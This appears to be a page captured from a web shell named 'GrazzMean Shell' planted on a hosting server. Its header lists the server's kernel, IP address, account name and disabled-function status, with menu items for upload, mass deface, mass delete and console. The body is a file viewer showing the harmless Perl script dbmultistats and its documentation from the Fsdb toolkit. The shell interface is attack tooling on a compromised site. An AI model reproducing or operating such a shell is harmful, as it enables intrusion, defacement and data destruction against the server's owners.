phadsconsult.com - GrazzMean

info server
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.129.26.49
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console
name : dbmultistats
#!/usr/bin/perl -w

#
# dbmultistats.pm
# Copyright (C) 1991-2024 by John Heidemann <johnh@isi.edu>
#
# This program is distributed under terms of the GNU general
# public license, version 2.  See the file COPYING
# in $dblibdir for details.
#


=head1 NAME

dbmultistats - run dbcolstats over each group of inputs identified by some key

=head1 SYNOPSIS

$0 [-dm] [-c ConfidencePercent] [-f FormatForm] [-q NumberOfQuartiles] -k KeyField ValueField

=head1 DESCRIPTION

The input table is grouped by KeyField,
then we compute a separate set of column statistics on ValueField 
for each group with a unique key.

Assumptions and requirements
are the same as L<dbmapreduce>
(this program is just a wrapper around that program):

By default, data can be provided in arbitrary order
and the program consumes O(number of unique tags) memory,
and O(size of data) disk space.

With the -S option, data must arrive group by tags (not necessarily sorted),
and the program consumes O(number of tags) memory and no disk space.
The program will check and abort if this precondition is not met.

With two -S's, program consumes O(1) memory, but doesn't verify
that the data-arrival precondition is met.

(Note that these semantics are exactly like
    dbmapreduce -k KeyField -- dbcolstats ValueField
L<dbmultistats> provides a simpler API that passes
through statistics-specific arguments
and is optimized when data is pre-sorted and there
are no quarties or medians.)

=head1 OPTIONS

Options are the same as L<dbcolstats>.

=over 4

=item B<-k> or B<--key> KeyField

specify which column is the key for grouping (default: the first column)

=item B<--output-on-no-input>

Enables null output (all fields are "-", n is 0)
if we get input with a schema but no records.
Without this option, just output the schema but no rows.
Default: no output if no input.

=item B<-a> or B<--include-non-numeric>

Compute stats over all records (treat non-numeric records
as zero rather than just ignoring them).

=item B<-c FRACTION> or B<--confidence FRACTION>

Specify FRACTION for the confidence interval.
Defaults to 0.95 for a 95% confidence factor.

=item B<-f FORMAT> or B<--format FORMAT>

Specify a L<printf(3)>-style format for output statistics.
Defaults to C<%.5g>.

=item B<-m> or B<--median>

Compute median value.  (Will sort data if necessary.)
(Median is the quantitle for N=2.)

=item B<-q N> or B<--quantile N>

Compute quantile (quartile when N is 4),
or an arbitrary quantile for other values of N,
where the scores that are 1 Nth of the way across the population.

=item B<-S> or B<--pre-sorted>

Assume data is already sorted.
With one -S, we check and confirm this precondition.
When repeated, we skip the check.

=item B<-T TmpDir>

where to put temporary data.
Only used if median or quantiles are requested.
Also uses environment variable TMPDIR, if -T is 
not specified.
Default is /tmp.

=item B<--parallelism=N> or B<-j N>

Allow up to N reducers to run in parallel.
Default is the number of CPUs in the machine.

=item B<-F> or B<--fs> or B<--fieldseparator> S

Specify the field (column) separator as C<S>.
See L<dbfilealter> for valid field separators.

=back


=for comment
begin_standard_fsdb_options

This module also supports the standard fsdb options:

=over 4

=item B<-d>

Enable debugging output.

=item B<-i> or B<--input> InputSource

Read from InputSource, typically a file name, or C<-> for standard input,
or (if in Perl) a IO::Handle, Fsdb::IO or Fsdb::BoundedQueue objects.

=item B<-o> or B<--output> OutputDestination

Write to OutputDestination, typically a file name, or C<-> for standard output,
or (if in Perl) a IO::Handle, Fsdb::IO or Fsdb::BoundedQueue objects.

=item B<--autorun> or B<--noautorun>

By default, programs process automatically,
but Fsdb::Filter objects in Perl do not run until you invoke
the run() method.
The C<--(no)autorun> option controls that behavior within Perl.

=item B<--header> H

Use H as the full Fsdb header, rather than reading a header from
then input.

=item B<--help>

Show help.

=item B<--man>

Show full manual.

=back

=for comment
end_standard_fsdb_options


=head1 SAMPLE USAGE

=head2 Input:

    #fsdb experiment duration
    ufs_mab_sys 37.2
    ufs_mab_sys 37.3
    ufs_rcp_real 264.5
    ufs_rcp_real 277.9

=head2 Command:

    cat DATA/stats.fsdb | dbmultistats -k experiment duration

=head2 Output:

    #fsdb      experiment      mean    stddev  pct_rsd conf_range      conf_low       conf_high        conf_pct        sum     sum_squared     min     max     n
    ufs_mab_sys     37.25 0.070711 0.18983 0.6353 36.615 37.885 0.95 74.5 2775.1 37.2 37.3 2
    ufs_rcp_real    271.2 9.4752 3.4938 85.13 186.07 356.33 0.95 542.4 1.4719e+05 264.5 277.9 2
    #  | /home/johnh/BIN/DB/dbmultistats experiment duration


=head1 SEE ALSO

L<Fsdb>.
L<dbmapreduce>.
L<dbcolstats>.


=cut


# WARNING: This code is derived from dbmultistats.pm; that is the master copy.

use Fsdb::Filter::dbmultistats;
my $f = new Fsdb::Filter::dbmultistats(@ARGV);
$f->setup_run_finish;  # or could just --autorun
exit 0;


=head1 AUTHOR and COPYRIGHT

Copyright (C) 1991-2024 by John Heidemann <johnh@isi.edu>

This program is distributed under terms of the GNU general
public license, version 2.  See the file COPYING
with the distribution for details.

=cut

1;
GrazzMean Shell